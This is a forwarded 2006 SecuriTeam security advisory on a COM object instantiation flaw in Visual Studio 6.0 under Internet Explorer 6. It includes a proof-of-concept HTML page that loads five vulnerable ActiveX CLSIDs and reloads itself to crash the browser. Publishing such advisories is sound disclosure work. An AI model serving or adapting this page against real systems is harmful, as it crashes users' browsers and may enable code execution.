Thread-topic: [NT] Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, August 20, 2006 8:27 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [NT] Visual Studio 6.0 Multiple COM Object
> Instantiation Vulnerability
> - - - - - - - - -
>
>
>
> Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
>
>
>
> Multiple vulnerability has been found in Visual Studio 6.0.
> When Internet Explorer tries to instantiate the TCPROPS.DLL,
> FP30WEC.DLL,mdt2db.dll,mdt2qd.dll,VI30AUT.DLL (Visual Studio
> 6.0) COM object as an ActiveX control, it may corrupt system
> memory in such a way that an attacker may DoS and possibly
> could execute arbitrary code.
>
>
> Vulnerable Systems:
> * Visual Studio version 6.0 with Internet Explorer version 6.0 SP1
>
> Exploit:
> <!--
> // Visual Studio 6.0 Multiple COM Object Instantiation Vulnerability
> // tested on Windows 2000/2003
>
> //
> // nop (nop#xsec.org)
>
> // CLSID: {9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}
> // Info: FpFile Class// ProgID: WECAPI.FpFile.1
> // InprocServer32: C:\WINDOWS\System\FP30WEC.DLL
>
> // CLSID: {AB39F080-0F5D-11D1-8E2F-00C04FB68D60}
> // Info: TCExtPage Class
> // InprocServer32: C:\PROGRA~1\MICROS~1\Common\Tools\TCPROPS.DLL
>
> // CLSID: {CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}
> // Info: FpaFile Class// ProgID: FpaFile.FpaFile.1
> // InprocServer32: C:\WINDOWS\system\VI30AUT.DLL
>
> // CLSID: {E9B0E6CB-811C-11D0-AD51-00A0C90F5739}
> // Info: Microsoft Data Tools Query Designer// ProgID:
> MSDTQueryDesigner2
> // InprocServer32: C:\Program Files\Common Files\Microsoft
> Shared\MSDesigners98\mdt2qd.dll
>
> // CLSID: {E9B0E6D4-811C-11D0-AD51-00A0C90F5739}
> // Info: Microsoft Data Tools Database Designer// ProgID:
> MSDTDatabaseDesigner2
> // InprocServer32: C:\Program Files\Common Files\Microsoft
> Shared\MSDesigners98\mdt2db.dll
> --!>
>
> <html><body>
> <object
> classid="CLSID:{9AF971C5-8E7A-11D0-A2BB-00C04FC33E92}"> </object>
> <object
> classid="CLSID:{AB39F080-0F5D-11D1-8E2F-00C04FB68D60}"> </object>
> <object
> classid="CLSID:{CCDBBDA1-FA19-11D0-9B51-00A0C91E29D8}"> </object>
> <object
> classid="CLSID:{E9B0E6CB-811C-11D0-AD51-00A0C90F5739}"> </object>
> <object
> classid="CLSID:{E9B0E6D4-811C-11D0-AD51-00A0C90F5739}"> </object>
> <!--
> </body>
> <script>location.reload();</script>
> </html>
>
>
> Additional Information:
> The information has been provided by nop <mailto:nop@xxxxxxxx> .
> The original article can be found at:
>
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
